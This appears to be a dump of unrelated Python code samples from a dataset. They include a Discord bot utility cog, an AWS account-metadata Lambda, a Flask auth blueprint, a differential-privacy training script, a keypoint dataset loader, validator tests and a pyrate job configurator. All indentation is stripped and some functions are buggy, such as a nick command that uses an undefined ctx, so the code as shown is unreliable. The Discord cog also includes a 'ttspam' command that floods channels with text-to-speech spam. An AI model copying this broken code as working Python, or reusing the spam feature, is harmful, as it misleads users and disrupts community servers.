sum(len(s.channels) for s in self.bot.servers),
sum(len(s.members) for s in self.bot.servers),
up))
@commands.command(aliases=['randcolor', 'randc', 'rc', 'randomcolor', 'colorgen', 'gcolor', 'gencolor', 'randcolour', 'randomcolour', 'colourgen', 'gcolour', 'gencolour'])
async def rcolor(self):
"""Generate a random color.
Usage: rcolor"""
col_rgb = [random.randint(1, 255) for i in range(0, 3)]
col_str = '0x%02X%02X%02X' % (col_rgb[0], col_rgb[1], col_rgb[2])
await self.bot.say(embed=discord.Embed(color=int(col_str, 16), title='Hex: ' + col_str.replace('0x', '#') + ' | RGB: ' + ', '.join([str(c) for c in col_rgb]) + ' | Integer: ' + str(int(col_str, 16))))
@commands.command(aliases=['character', 'char', 'cinfo', 'unicode'])
async def charinfo(self, *, uchars: str):
"""Get the Unicode info for a character or characters.
Usage: charinfo [character(s)]"""
no_preview = [
'\u0020',
'\uFEFF'
]
cinfo = commands.Paginator(prefix='', suffix='', max_size=(1999 if self.bot.selfbot else 2000))
for char in list(uchars.replace('\n', '')):
hexp = str(hex(ord(char))).replace('0x', '').upper()
while len(hexp) < 4:
hexp = '0' + hexp
preview = f' (`{char}`)'
cinfo.add_line(f'U+{hexp} {unicodedata.name(char)} {char}' + (preview if char not in no_preview else ''))
if len(cinfo.pages) > 5:
await self.bot.say('Too long, trimming to 5 pages.')
for page in cinfo.pages[0:5]:
await self.bot.say(page)
@commands.command()
async def encode(self, *, content: str):
"""Encode your text into Goldmine's encoding!
Usage: encode [text]"""
await self.bot.say('```' + (b_encode(content)) + '```')
@commands.command()
async def decode(self, *, content: str):
"""Decode your text from Goldmine's encoding!
Usage: decode [encoded text]"""
await self.bot.say('```' + (b_decode(content)) + '```')
@commands.cooldown(1, 6.75, type=commands.BucketType.user)
@commands.command(pass_context=True, aliases=['mc'])
async def minecraft(self, ctx, *, server_ip: str):
"""Get information about a Minecraft server.
Usage: minecraft [server address]"""
port = 25565
port_split = server_ip.split(':')
server = port_split[0].replace('/', '')
if len(port_split) > 1:
try:
port = int(port_split[1])
except ValueError:
pass
if ('.' not in server) or (' ' in server_ip):
await self.bot.say(':warning: Invalid address.')
return
try:
self.logger.info('Connecting to Minecraft server ' + server + ':' + str(port) + '...')
with async_timeout.timeout(5):
data = await self.loop.run_in_executor(None, mclib.get_info, server, port)
except Exception as e:
await self.bot.send_message(ctx.message.channel, f':warning: Couldn\'t get server info for `{server}:{port}`.')
return
desc = ''
server_type = 'Vanilla'
def decode_extra_desc():
final = []
format_keys = {
'bold': '**',
'italic': '*',
'underlined': '__',
'strikethrough': '~~'
}
for e in data['description']['extra']:
item = e['text']
for fkey in format_keys:
if e.get(fkey, False):
int_key = '%{f:' + fkey + '}$'
item = int_key + item + int_key
final.append(item)
final = ''.join(final)
for fkey in format_keys:
int_key = '%{f:' + fkey + '}$'
final = final.replace(int_key * 3, '').replace(int_key * 2, '')
final = final.replace(int_key, format_keys[fkey])
return final
if isinstance(data['description'], dict):
if 'text' in data['description']:
if data['description']['text']:
desc = data['description']['text']
else:
desc = decode_extra_desc()
else:
desc = decode_extra_desc()
elif isinstance(data['description'], str):
desc = data['description']
else:
desc = str(data['description'])
def decode_section_code():
formats = {
'l': '**',
'n': '__',
'o': '*',
'k': '',
'm': '~~',
'k': '**',
'r': ''
} # k = obf, r = reset
state = ''
desc = re.sub(r'\u00a7[4c6e2ab319d5f780lnokmr]', '', desc)
rc = random.randint(0, 256**3-1)
emb = discord.Embed(title=server + ':' + str(port), description=desc, color=rc)
try:
target = ctx.message.server.me
except AttributeError:
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
emb.set_footer(text=target.name, icon_url=avatar_link)
emb.add_field(name='Players', value=str(data['players']['online']) + '/' + str(data['players']['max']))
if data['players'].get('sample', False):
content = re.sub(r'\u00a7[4c6e2ab319d5f78lnokmr]', '', smartjoin([p['name'] for p in data['players']['sample']]))
if len(content) <= 1024:
emb.add_field(name='Players Online', value=content)
else:
pages = textwrap.wrap(content, width=1024)
for page in pages:
emb.add_field(name='Players Online', value=page)
emb.add_field(name='Version', value=re.sub(r'\u00a7[4c6e2ab319d5f78lnokmr]', '', data['version']['name']))
emb.add_field(name='Protocol Version', value=data['version']['protocol'])
if 'modinfo' in data:
if 'modList' in data['modinfo']:
if data['modinfo']['modList']:
content = smartjoin([m['modid'].title() + ' ' +
m['version'] for m in data['modinfo']['modList']])
if len(content) <= 1024:
emb.add_field(name='Mods', value=content)
else:
pages = textwrap.wrap(content, width=1024)
for page in pages:
emb.add_field(name='Mods', value=page)
else:
emb.add_field(name='Use of Mods', value='This server appears to fake its identity, so Forge clients will send their mod list.')
if data['modinfo'].get('type', False):
t = data['modinfo']['type']
if t.lower() == 'fml':
server_type = 'Forge / FML'
else:
server_type = t.title()
emb.add_field(name='Server Type', value=server_type)
emb.add_field(name='Ping', value=str(round(data['latency_ms'], 2)) + 'ms')
await self.bot.say(embed=emb)
@commands.cooldown(1, 20, type=commands.BucketType.user)
@commands.command(pass_context=True)
async def contact(self, ctx, *, message: str):
"""Contact the bot owner with a message.
Usage: contact [message]"""
for m in ctx.message.mentions:
message = message.replace(m.mention, '@' + str(m))
msg_object = {
'message': message,
'user': str(ctx.message.author),
'nick': ctx.message.author.display_name,
'message_id': ctx.message.id,
'user_id': ctx.message.author.id,
'channel_id': ctx.message.channel.id,
'pm': ctx.message.channel.is_private,
'time': str(ctx.message.timestamp),
'timestamp': ctx.message.timestamp.timestamp(),
'contains_mention': bool(ctx.message.mentions),
}
if ctx.message.server:
msg_object.update({
'server': ctx.message.server.name,
'server_id': ctx.message.server.id,
'server_members': len(ctx.message.server.members),
'channel': ctx.message.channel.name
})
self.bot.store['owner_messages'].append(msg_object)
await self.bot.say(':thumbsup: Message recorded.')
@commands.command(pass_context=True, aliases=['randomprofle', 'randomprof', 'rprof', 'rp', 'randp'])
async def rprofile(self, ctx):
"""Get a random profile.
Usage: rprofile"""
name_overrides = {
'cvv': 'CVV',
'cid': 'CID'
}
excluded = ['password', 'sexual_orientation', 'avatar', 'identifier', 'title',
'language', 'paypal', 'worldview', 'views_on', 'political_views',
'surname']
if not ctx.message.author.avatar_url:
ctx.message.author.avatar_url = ctx.message.author.default_avatar_url
emb = discord.Embed(color=random.randint(1, 255**3-1))
emb.set_author(name=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url)
p = elizabeth.Personal()
traits = {}
calls = {d: getattr(p, d) for d in dir(p) if (not d.startswith('_')) and hasattr(getattr(p, d), '__call__')}
for call in calls:
if call not in excluded:
if call in name_overrides:
f_name = name_overrides[call]
else:
f_name = call.replace('_', ' ').title()
traits[f_name] = calls[call]()
emb.set_thumbnail(url=p.avatar())
emb.title = traits['Full Name'].split()[0]
for trait in traits:
emb.add_field(name=trait, value=str(traits[trait]))
await self.bot.say(embed=emb)
@commands.cooldown(1, 5.75, type=commands.BucketType.user)
@commands.command(pass_context=True, aliases=['qr', 'makeqr', 'qrmake'])
async def qrcode(self, ctx, *, text: str):
"""Create a QR code.
Usage: qrcode [text to use]"""
img_bytes = BytesIO()
image = await self.loop.run_in_executor(None, qrcode.make, text)
image.save(img_bytes, format='PNG')
img_bytes.seek(0)
await self.bot.send_file(ctx.message.channel, img_bytes, filename='qrcode.png')
@commands.command()
async def avatar(self, *, target: discord.User):
"""Get someone's avatar.
Usage: avatar [member]"""
au = target.avatar_url
await self.bot.say(au if au else target.default_avatar_url)
@commands.command(pass_context=True)
async def ocr(self, ctx):
"""OCR an image.
Usage: ocr [attach an image]"""
or_check_perms(ctx, ('bot_owner',))
if not have_pil:
await self.bot.say('The bot owner hasn\'t set up this feature!')
return False
warnings.simplefilter('error', Image.DecompressionBombWarning)
if ctx.message.attachments:
with async_timeout.timeout(5):
async with aiohttp.request('GET', ctx.message.attachments[0]['url']) as r:
raw_image = await r.read()
else:
await self.bot.say(':warning: No attachment found.')
return
img_bytes = BytesIO(raw_image)
image = Image.open(img_bytes)
text = tesserocr.image_to_text(image)
if text:
await self.bot.say(text)
else:
await self.bot.say('No results.')
@commands.command(aliases=['cm_discrim'])
async def discrim(self, *, discriminator: str):
"""Look up users by discriminator.
Usage: discrim [discriminator]"""
d = discriminator
targets = list(set(str(m) for m in self.bot.get_all_members() if m.discriminator == d))
if targets:
await self.bot.say('**I found: **\n' + '\n'.join(targets))
else:
await self.bot.say('I found no matches. Maybe I\'m not in a server with them?')
@commands.command(pass_context=True, aliases=['perms'])
async def permissions(self, ctx):
"""Get your permissions here.
Usage: permissions"""
perms = ['**' + k[0].replace('_', ' ').title() + '**' for k in list(ctx.message.author.permissions_in(ctx.message.channel)) if k[1]]
if '**Administrator**' in perms:
perms.remove('**Administrator**')
perms.append('be an **administrator**')
if '**Send Tts Messages**' in perms:
perms[perms.index('**Send Tts Messages**')] = '**Send TTS Messages**'
await self.bot.say('You can ' + smartjoin(perms) + '!')
@commands.group(pass_context=True, name='xkcd')
async def cmd_xkcd(self, ctx):
"""Get a xkcd comic.
Usage: xkcd {stuff}"""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
@commands.cooldown(1, 4, type=commands.BucketType.user)
@cmd_xkcd.command(name='random')
async def xkcd_random(self):
"""Get a random comic from xkcd.
Usage: xkcd random"""
comic = await xkcd.random_comic()
emb = discord.Embed(color=random.randint(1, 255**3-1), title=comic.title)
emb.set_image(url=comic.image_link)
emb.set_footer(text=comic.alt_text)
await self.bot.say(embed=emb)
@commands.cooldown(1, 4, type=commands.BucketType.user)
@cmd_xkcd.command(name='latest')
async def xkcd_latest(self):
"""Get the latest comic from xkcd.
Usage: xkcd latest"""
comic = await xkcd.latest_comic()
emb = discord.Embed(color=random.randint(1, 255**3-1), title=comic.title)
emb.set_image(url=comic.image_link)
emb.set_footer(text=comic.alt_text)
await self.bot.say(embed=emb)
@commands.cooldown(1, 4, type=commands.BucketType.user)
@cmd_xkcd.command(name='number')
async def xkcd_number(self, number: int):
"""Get the Nth comic from xkcd.
Usage: xkcd number [number]"""
try:
comic = await xkcd.get_comic(number)
except xkcd.InvalidComic:
await self.bot.say(':warning: That comic doesn\'t exist.')
return
emb = discord.Embed(color=random.randint(1, 255**3-1), title=comic.title)
emb.set_image(url=comic.image_link)
emb.set_footer(text=comic.alt_text)
await self.bot.say(embed=emb)
@commands.command(aliases=['zws', 'u200b', '200b'])
async def zwsp(self, number: int=1):
"""Output a number of ZWSPs.
Usage: zwsp {number = 1}"""
if number > 2000:
await self.bot.say('I can\'t give you more than 2000 ZWSPs.')
elif number > 0:
await self.bot.say('\u200b' * number)
else:
await self.bot.say('I can\'t give you zero ZWSPs.')
@commands.command()
async def b64decode(self, *, b64: str):
"""Decode some base64 data.
Usage: b64decode [base64]"""
br = base64.b64decode(b64)
try:
m = br.decode('utf-8')
except ValueError:
m = '```' + str(br)[2:][:-1] + '```'
await self.bot.say(m)
@commands.command()
async def b64encode(self, *, b64: str):
"""Encode some base64 data.
Usage: b64encode [base64]"""
br = base64.b64encode(b64.encode('utf-8'))
try:
m = br.decode('utf-8')
except ValueError:
m = '```' + str(br)[2:][:-1] + '```'
await self.bot.say(m)
@commands.command(pass_context=True, aliases=['ttsspam', 'tts_spam'])
async def ttspam(self, ctx, *, text: str):
"""Spam a message with TTS. **This may get you banned from servers.**
Usage: ttspam [message]"""
or_check_perms(ctx, ('manage_messages',))
m = await self.bot.say(textwrap.wrap((text + ' ') * 2000, width=2000)[0], tts=True)
await asyncio.sleep(0.1)
await self.bot.delete_message(m)
@commands.command(pass_context=True, aliases=['ip', 'rdns', 'reverse_dns', 'reversedns'])
async def ipinfo(self, ctx, *, ip: str):
"""Get the GeoIP and rDNS data for an IP.
Usage: ipinfo [ip/domain]"""
emb = discord.Embed(color=random.randint(1, 255**3-1))
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
emb.set_author(icon_url=avatar_link, name='IP Data')
async with aiohttp.ClientSession(loop=self.loop) as sess:
with async_timeout.timeout(5):
async with sess.get('https://freegeoip.net/json/' + ip) as r:
data_res = await r.json()
rdns = 'Failed to fetch'
try:
with async_timeout.timeout(6):
rdns = (await self.loop.run_in_executor(None, socket.gethostbyaddr, data_res['ip']))[0]
except Exception:
pass
emb.add_field(name='IP', value=data_res['ip'])
emb.add_field(name='Reverse DNS', value=rdns)
emb.add_field(name='Country', value=data_res['country_name'] + ' (%s)' % data_res['country_code'])
region_val = data_res['region_name'] + ' (%s)' % data_res['region_code']
emb.add_field(name='Region', value=(region_val if region_val != ' ()' else 'Not specified'))
emb.add_field(name='City', value=(data_res['city'] if data_res['city'] else 'Not specified'))
emb.add_field(name='ZIP Code', value=(data_res['zip_code'] if data_res['zip_code'] else 'Not specified'))
emb.add_field(name='Timezone', value=(data_res['time_zone'] if data_res['time_zone'] else 'Not specified'))
emb.add_field(name='Longitude', value=data_res['longitude'])
emb.add_field(name='Latitude', value=data_res['latitude'])
emb.add_field(name='Metro Code', value=(data_res['metro_code'] if data_res['metro_code'] != 0 else 'Not specified'))
await self.bot.send_message(ctx.message.channel, embed=emb)
@commands.command()
async def dial(self, *, number: str):
"""Dial someone on the phone!
Usage: dial [phone number]"""
self.logger.info('Dialing ' + number + '...')
await self.bot.say(':telephone: **Dialing {}...**'.format(number))
await asyncio.sleep((random.randint(1, 3) + random.uniform(0, 1)) * random.uniform(0.4, 1.6) + random.uniform(0, 1))
await self.bot.say('**No answer.**')
@commands.command(aliases=['define'])
async def urban(self, *, term: str):
"""Define something, according to Urban Dictionary.
Usage: urban [term]"""
async with aiohttp.ClientSession(loop=self.loop) as sess:
with async_timeout.timeout(5):
async with sess.get('http://api.urbandictionary.com/v0/define', params={'term': term}) as r:
data_res = await r.json()
try:
word = data_res['list'][0]
except IndexError:
await self.bot.say('No results.')
return
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
emb = discord.Embed(color=random.randint(0, 255**3-1), title=word['word'])
emb.set_author(name='U<NAME>', url=word['permalink'], icon_url='https://images.discordapp.net/.eJwFwdsNwyAMAMBdGICHhUPIMpULiCAlGIHzUVXdvXdf9cxLHeoUGeswJreVeGa9hCfVoitzvQqNtnTi25AIpfMuXZaBDSM4G9wWAdA5vxuIAQNCQB9369F7a575pv7KLUnjTvOjR6_q9wdVRCZ_.BorCGmKDHUzN6L0CodSwX7Yv3kg')
emb.set_footer(text=datetime.now().strftime(absfmt))
definition = word['definition']
if definition:
def_pages = textwrap.wrap(definition, width=1024)
for pg in def_pages[:3]:
emb.add_field(name='Definition', value=pg, inline=False)
else:
emb.add_field(name='Definition', value='None?!?!', inline=False)
example = word['example']
if example:
ex_pages = textwrap.wrap(example, width=1024)
for pg in ex_pages[:3]:
emb.add_field(name='Example', value=pg, inline=False)
else:
emb.add_field(name='Example', value='None?!?!', inline=False)
emb.add_field(name='👍', value=word['thumbs_up'])
emb.add_field(name='👎', value=word['thumbs_down'])
await self.bot.say(embed=emb)
@commands.command(aliases=['nickname', 'setnick'])
async def nick(self, *, nick: str):
"""Set your nickname.
Usage: nick [new nickname]"""
if ctx.message.author.server_permissions.change_nickname:
await self.bot.change_nickname(ctx.message.author, nick)
await self.bot.say('Done! :thumbsup:')
else:
await self.bot.say(':thumbsdown: You don\'t have the permission to change your nickname. Contact an admin.')
@commands.command()
async def bleach(self):
"""Get some bleach. NOW.
Usage: bleach"""
emb = discord.Embed(color=random.randint(0, 255**3-1), title='Bleach')
emb.set_image(url='https://upload.wikimedia.org/wikipedia/commons/d/d3/Clorox_Bleach_products.jpg')
await self.bot.say(embed=emb)
@commands.command()
async def mcskin(self, *, username: str):
"""Get a Minecraft player's skin.
Usage: mcskin [username]"""
un = username.replace('\u200b', '').replace('/', '').replace('\u200e', '')
if not re.match(r'^[a-zA-Z0-9_]+$', un):
await self.bot.say(':warning: Invalid username.')
return
emb = discord.Embed(color=random.randint(0, 255**3-1), title=un + "'s skin")
emb.set_image(url='https://mcapi.ca/skin/' + un + '/150/true')
await self.bot.say(embed=emb)
@commands.command()
async def mchead(self, *, username: str):
"""Get a Minecraft player's head.
Usage: mchead [username]"""
un = username.replace('\u200b', '').replace('/', '').replace('\u200e', '')
if not re.match(r'^[a-zA-Z0-9_]+$', un):
await self.bot.say(':warning: Invalid username.')
return
emb = discord.Embed(color=random.randint(0, 255**3-1), title=un + "'s head")
emb.set_image(url='https://mcapi.ca/avatar/' + un + '/150/true')
await self.bot.say(embed=emb)
def setup(bot):
c = Utility(bot)
bot.add_cog(c)
| StarcoderdataPython |
3310068 | from ._JSONError import JSONError
class JSONPropertyError(JSONError):
"""
Base class for all errors involving JSON properties.
"""
pass
| StarcoderdataPython |
169975 | <filename>src/setup.py
from setuptools import setup, find_packages
setup(
name='pyschedule',
version='0.2.34',
description='A python package to formulate and solve resource-constrained scheduling problems',
url='https://github.com/tpaviot/pyschedule',
author='<NAME>',
author_email='<EMAIL>',
license='Apache 2.0',
packages=find_packages(),
install_requires=['pulp'],
include_package_data=True
)
| StarcoderdataPython |
1626006 | <gh_stars>0
import inspect
from typing import Any, Dict, Union
import aft_common.aft_utils as utils
import boto3
from boto3.session import Session
logger = utils.get_logger()
def persist_metadata(
payload: Dict[str, Any], account_info: Dict[str, str], session: Session
) -> Dict[str, Any]:
logger.info("Function Start - persist_metadata")
account_tags = payload["account_request"]["account_tags"]
account_customizations_name = payload["account_request"][
"account_customizations_name"
]
metadata_table_name = utils.get_ssm_parameter_value(
session, utils.SSM_PARAM_AFT_DDB_META_TABLE
)
item = {
"id": account_info["id"],
"email": account_info["email"],
"account_name": account_info["name"],
"account_creation_time": account_info["joined_date"],
"account_status": account_info["status"],
"account_level_tags": account_tags,
"account_customizations_name": account_customizations_name,
"parent_ou": account_info["parent_id"],
"vcs_information": {},
"terraform_workspace": {},
}
logger.info("Writing item to " + metadata_table_name)
logger.info(item)
response = utils.put_ddb_item(session, metadata_table_name, item)
logger.info(response)
return response
def lambda_handler(
event: Dict[str, Any], context: Union[Dict[str, Any], None]
) -> Dict[str, Any]:
try:
logger.info("AFT Account Provisioning Framework Handler Start")
rollback = None
try:
if event["rollback"]:
rollback = True
except KeyError:
pass
payload = event["payload"]
action = event["action"]
session = boto3.session.Session()
if action == "persist_metadata":
account_info = payload["account_info"]["account"]
update_metadata = persist_metadata(payload, account_info, session)
return update_metadata
else:
raise Exception(
"Incorrect Command Passed to Lambda Function. Input: {action}. Expected: 'persist_metadata'"
)
except Exception as e:
message = {
"FILE": __file__.split("/")[-1],
"METHOD": inspect.stack()[0][3],
"EXCEPTION": str(e),
}
logger.exception(message)
raise
if __name__ == "__main__":
import json
import sys
from optparse import OptionParser
logger.info("Local Execution")
parser = OptionParser()
parser.add_option(
"-f", "--event-file", dest="event_file", help="Event file to be processed"
)
(options, args) = parser.parse_args(sys.argv)
if options.event_file is not None:
with open(options.event_file) as json_data:
event = json.load(json_data)
lambda_handler(event, None)
else:
lambda_handler({}, None)
| StarcoderdataPython |
193461 | import numpy as np
import torch
import pickle
import experiment_runner as er
from torch import nn
import sklearn.datasets
from sklearn.model_selection import train_test_split
from torch.utils.data import TensorDataset
print("test")
n_classes = 10
X, y = sklearn.datasets.make_classification(n_samples=1000,
n_features=10,
n_informative=5,
n_redundant=2,
n_repeated=0,
class_sep=1.0,
n_classes=n_classes)
n_features = X.shape[1]
(X_train, X_test, y_train, y_test) = train_test_split(X, y, test_size=0.2, random_state=7)
BATCH_SIZE = 64
training_dataset = TensorDataset(torch.from_numpy(X_train).float(),
torch.from_numpy(y_train).long())
testing_dataset = TensorDataset(torch.from_numpy(X_test).float(),
torch.from_numpy(y_test).long())
class Classifier(nn.Module):
def __init__(self, n_features, n_hidden=256):
super(Classifier, self).__init__()
self.network = nn.Sequential(
nn.Linear(n_features, n_hidden),
nn.ReLU(),
nn.Linear(n_hidden, n_hidden),
nn.ReLU(),
nn.Linear(n_hidden, n_hidden),
nn.ReLU(),
nn.Linear(n_hidden, n_classes),
nn.LogSoftmax()
)
def forward(self, x):
return self.network(x)
print("test 3")
epsilons = [1 , 10, 100, 1000, 5000, 10000, 50000, 100000]
#epsilons = [0, 1, 100, 1000, 10000, 50000, 100000]
throw_outs = [.03, .07, .1, .2,.5,1, 1.5, 2, 5]
for e in epsilons:
for t in throw_outs:
print(f"model: {e}, {t}, {BATCH_SIZE} begin")
model = Classifier(n_features)
info, mode = er.run_experiment(model,
training_dataset,
testing_dataset,
epsilon=e,
alpha=2,
epochs=200,
add_noise=True,
throw_out_threshold=t,
batch_size=BATCH_SIZE,
lf=torch.nn.NLLLoss,
print_rate=10)
pickle.dump(info, open(f"../../data/synth_{e}_{t}_{BATCH_SIZE}.p", 'wb'))
| StarcoderdataPython |
57497 | <gh_stars>0
from flask import Blueprint, render_template, url_for
auth = Blueprint('auth', __name__)
@auth.route('/login')
def login():
return render_template("login.html")
@auth.route('/logout')
def logout():
return render_template("logout.html")
@auth.route('/sign_up')
def sign_up():
return render_template("sign_up.html") | StarcoderdataPython |
3338642 | #!/usr/bin/python3
c = list('614752839')
def dec(i):
i = int(i) - 1
if i == 0: i = 9
return str(i)
def move(c):
t = c[1:4]
c[1:4] = []
val = dec(c[0])
while val in t:
val = dec(val)
i = c.index(val)
print(t, c, i)
c[i+1:i+1] = t
return c[1:] + [c[0]]
for _ in range(100):
c = move(c)
print(c)
i = c.index('1')
print(''.join(c[i+1:] + c[:i])) | StarcoderdataPython |
1717157 | <reponame>gathierry/FashionAI-KeyPointsDetectionOfApparel<gh_stars>100-1000
import numpy as np
from sklearn.model_selection import train_test_split
import pandas as pd
import cv2
class KPDA():
def __init__(self, config, data_dir, train_val):
self.config = config
if train_val == 'test':
data_dir += 'r2_test_b/'
anno_df = pd.read_csv(data_dir + 'test.csv')
anno_df['image_path'] = data_dir + anno_df['image_id']
# elif train_val == 'val':
# data_dir += 'r1_test_b/'
# anno_df = pd.read_csv(data_dir + 'fashionAI_key_points_test_b_answer_20180426.csv')
# anno_df['image_path'] = data_dir + anno_df['image_id']
else:
data_dir0 = data_dir + 'wu_train/'
anno_df0 = pd.read_csv(data_dir0 + 'Annotations/annotations.csv')
anno_df0['image_path'] = data_dir0 + anno_df0['image_id']
data_dir1 = data_dir + 'r1_train/'
anno_df1 = pd.read_csv(data_dir1 + 'Annotations/train.csv')
anno_df1['image_path'] = data_dir1 + anno_df1['image_id']
data_dir2 = data_dir + 'r1_test_a/'
anno_df2 = pd.read_csv(data_dir2 + 'fashionAI_key_points_test_a_answer_20180426.csv')
anno_df2['image_path'] = data_dir2 + anno_df2['image_id']
# anno_df = pd.concat([anno_df0, anno_df1, anno_df2])
data_dir3 = data_dir + 'r1_test_b/'
anno_df3 = pd.read_csv(data_dir3 + 'fashionAI_key_points_test_b_answer_20180426.csv')
anno_df3['image_path'] = data_dir3 + anno_df3['image_id']
anno_df3_train, anno_df3_val = train_test_split(anno_df3, test_size=0.2, random_state=42)
if train_val == 'train':
anno_df = pd.concat([anno_df0, anno_df1, anno_df2, anno_df3_train])
else:
anno_df = anno_df3_val
self.anno_df = anno_df[anno_df['image_category'] == self.config.clothes]
def size(self):
return len(self.anno_df)
def get_image_path(self, image_index):
row = self.anno_df.iloc[image_index]
image_path = row['image_path']
return image_path
def get_bbox(self, image_index, extend=10):
row = self.anno_df.iloc[image_index]
locs = []
for key, item in row.iteritems():
if key in self.config.keypoints[self.config.clothes]:
loc = [int(x) for x in item.split('_')]
if loc[0] != -1 and loc[1] != -1:
locs.append(loc[:2])
locs = np.array(locs)
minimums = np.amin(locs, axis=0)
maximums = np.amax(locs, axis=0)
bbox = np.array([[max(minimums[0]-extend, 0), max(minimums[1]-extend, 0),
maximums[0]+extend, maximums[1]+extend]], dtype=np.float32)
return bbox
def get_keypoints(self, image_index):
row = self.anno_df.iloc[image_index]
locs = []
for key, item in row.iteritems():
if key in self.config.keypoints[self.config.clothes]:
loc = [int(x) for x in item.split('_')]
locs.append(loc)
locs = np.array(locs)
return locs
def get_default_xy(config, db_path):
kpda = KPDA(config, db_path, 'all')
s = []
for k in range(kpda.size()):
path = kpda.get_image_path(k)
img = cv2.imread(path)
h, w, _ = img.shape
locs = kpda.get_keypoints(k).astype(np.float32)
locs[:, 0] = locs[:, 0].astype(np.float32) / float(w)
locs[:, 1] = locs[:, 1].astype(np.float32) / float(h)
locs[:, 2] = (locs[:, 2]>=0)*1.0
s.append(locs)
s = np.stack(s)
s = s.sum(axis=0)
s = s[:, :2] / s[:, 2:].repeat(2, axis=1)
print(s)
if __name__ == '__main__':
from tqdm import tqdm
import cv2
from src.config import Config
config = Config('dress')
kpda = KPDA(config, '/home/storage/lsy/fashion/FashionAI_Keypoint_Detection/', 'train')
print(kpda.anno_df)
| StarcoderdataPython |
3244712 | <gh_stars>1-10
from typing import Any, List
from src.spotlight.rules import Rule
from .validator_test import ValidatorTest
class ExactlyFiveCharsRule(Rule):
"""Exactly 5 characters"""
name = "five_chars"
def passes(self, field: str, value: Any, parameters: List[str], validator) -> bool:
self.message_fields = dict(field=field, name="you.can.replace.this")
return len(value) == 5
@property
def message(self) -> str:
return "The {field} field has to be exactly 5 chars long {name}!"
class UppercaseRule(Rule):
"""Uppercase"""
name = "uppercase"
def passes(self, field: str, value: Any, parameters: List[str], validator) -> bool:
self.message_fields = dict(field=field)
return value.upper() == value
@property
def message(self) -> str:
return "The {field} field must be uppercase."
class CustomRuleTest(ValidatorTest):
def setUp(self):
self.validator.fields = {}
def test_custom_rule_uppercase_with_non_uppercase_string_expect_error(self):
field = "test"
rules = {"test": "uppercase"}
data = {"test": "test"}
expected = "The test field must be uppercase."
rule = UppercaseRule()
self.validator.register_rule(rule)
errors = self.validator.validate(data, rules)
errs = errors.get(field)
self.assertEqual(errs[0], expected)
def test_custom_rule_five_chars_with_invalid_string_expect_error(self):
field = "test"
rules = {"test": "five_chars"}
data = {"test": "test"}
rule = ExactlyFiveCharsRule()
self.validator.overwrite_fields = {
"test": "test",
"you.can.replace.this": "custom",
}
expected = rule.message.format(field=field, name="custom")
self.validator.register_rule(rule)
errors = self.validator.validate(data, rules)
errs = errors.get(field)
self.assertEqual(errs[0], expected)
| StarcoderdataPython |
122706 | <gh_stars>0
""" This class will handle a set of configurations and launch several
instances of a Run homogeneous in purpose and structure.
"""
import os
import sys
import yaml
import pyclbr
import logging
from itertools import groupby
from pyrate.utils import strings as ST
from pyrate.utils import functions as FN
from pyrate.core.Run import Run
class Job:
def __init__(self, name, config, log_level):
self.name = name
self.config = config
self.log_level = log_level
def setup(self):
"""Build global Job configuration and instantiate Run objects.
The keys of the following dictionary will be distributed to the Run.
"""
self.job = {
"no_progress_bar": self.config["no_progress_bar"],
"logger": None,
"inputs": {},
"configs": {},
"outputs": {},
}
# --------------------------
# Setup the logger
# --------------------------
self.job["logger"] = logging.getLogger("pyrate")
self.job["logger"].setLevel(getattr(logging, self.log_level))
# --------------------------
# Build global configuration
# --------------------------
for i_name, i_attr in self.config["inputs"].items():
# This dictionary contains all input information. The file list contains lists
# which can have more than one element in the case of multiple channels declared in the group.
self.job["inputs"][i_name] = {"files": []}
# Files are collected looking for tags separated by underscores. Sevaral options are available
# to collect tags.
# 1) any: (REQUIRED) collect a file if it contains any of these tags.
# 2) all: collect a file if it contains all of these tags.
# 3) gropus: if a file starts with any of the tags declared here it will be considered as part of a group.
#
# Files can also be added providing their full path under the 'path' field. Notice that if the 'samples' options
# are ALSO provided, all files added in this way will be selected according to the 'tags' rules as usual.
for f in FN.find_files(i_attr["path"], "PYRATE"):
if "samples" in i_attr:
self.job["inputs"][i_name]["files"].extend(
f
for s in ST.get_items(i_attr["samples"]["tags"]["any"])
if s in ST.get_tags(f)
and FN.modus_ponens(
"all" in i_attr["samples"]["tags"],
all(
t in ST.get_tags(f)
for t in ST.get_items(
i_attr["samples"]["tags"].get("all", False)
)
),
)
and FN.modus_ponens(
"groups" in i_attr["samples"]["tags"],
any(
c in ST.get_tags(f)
for c in ST.get_items(
i_attr["samples"]["tags"].get("groups", False)
)
),
)
)
else:
self.job["inputs"][i_name]["files"].append(f)
# removing duplicates from the list of files. At this stage no groups are built yet.
self.job["inputs"][i_name]["files"] = ST.remove_duplicates(
self.job["inputs"][i_name]["files"]
)
# Group files using the first tag found in their name.
self.job["inputs"][i_name]["files"] = [
list(f)
for j, f in groupby(
self.job["inputs"][i_name]["files"],
lambda a: a.partition("_")[0]
if FN.find("groups", i_attr)
else None,
)
]
if not self.job["inputs"][i_name]["files"]:
sys.exit(
f"ERROR: no input files found for input {i_name} under path {i_attr['path']}"
)
# Add all remaining attributes.
self.job["inputs"][i_name].update(i_attr)
self.job["configs"]["global"] = {"objects": {}}
for c_name, c_attr in self.config["configs"].items():
self.job["configs"][c_name] = {"files": []}
"""
for f in FN.find_files(c_attr["path"], "PYRATE"):
self.job["configs"][c_name]["files"].extend(f)
for t in ST.get_tags(f)
for s in FN.find("any", c_attr):
ST.get_items(s)
if s in ST.get_tags(f):
True
for s in FN.find("all", c_attr):
ST.get_items(s)
if s in ST.get_tags(f):
True
"""
for f in FN.find_files(c_attr["path"], "PYRATE"):
self.job["configs"][c_name]["files"].extend(
f
for n in ST.get_items(c_attr["tags"]["any"])
if n in ST.get_tags(f)
and FN.modus_ponens(
"all" in c_attr["tags"],
all(
t in ST.get_tags(f)
for t in ST.get_items(c_attr["tags"].get("all", False))
),
)
and f.lower().endswith(".yaml")
)
for f in self.job["configs"][c_name]["files"]:
self.job["configs"][c_name].update(yaml.full_load(open(f, "r")))
self.job["configs"]["global"]["objects"].update(
self.job["configs"][c_name]["objects"]
)
for o_name, o_attr in self.config["outputs"].items():
self.job["outputs"][o_name] = {"files": []}
o_attr["path"] = FN.find_env(o_attr["path"], "PYRATE")
